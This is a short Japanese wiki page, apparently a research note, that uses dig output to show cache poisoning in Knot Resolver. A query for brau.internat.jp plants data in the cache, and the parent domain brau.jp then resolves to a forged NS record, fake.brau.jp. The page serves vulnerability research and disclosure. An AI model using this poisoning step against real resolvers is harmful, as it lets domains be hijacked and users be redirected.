MoinQ:

1. DNS/KnotResolver/brau.internat.jp/brau.jpを乗取る/第二段/必要なかったケース/その2

1.1. 毒入れ

$ dig -t txt brau.internat.jp @127.0.0.1

; <<>> DiG 9.16.1-Ubuntu <<>> -t txt brau.internat.jp @127.0.0.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8273
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;brau.internat.jp.              IN      TXT

;; ANSWER SECTION:
brau.internat.jp.       60      IN      TXT     "brau.internat.jp"

;; Query time: 19 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: 日  8月 30 14:03:40 JST 2020
;; MSG SIZE  rcvd: 74

1.2. これだけで毒が見える

$ dig -t txt brau.jp @127.0.0.1

; <<>> DiG 9.16.1-Ubuntu <<>> -t txt brau.jp @127.0.0.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59513
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;brau.jp.                       IN      TXT

;; ANSWER SECTION:
brau.jp.                60      IN      TXT     "NG"

;; Query time: 11 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: 日  8月 30 14:03:46 JST 2020
;; MSG SIZE  rcvd: 51

$ dig -t ns brau.jp @127.0.0.1

brau.jp.                300     IN      NS      fake.brau.jp.

MoinQ: DNS/KnotResolver/危ない機能/brau.jpを乗取る/第二段/必要なかったケース/その2 (last edited 2020-08-30 23:00:14 by ToshinoriMaeno)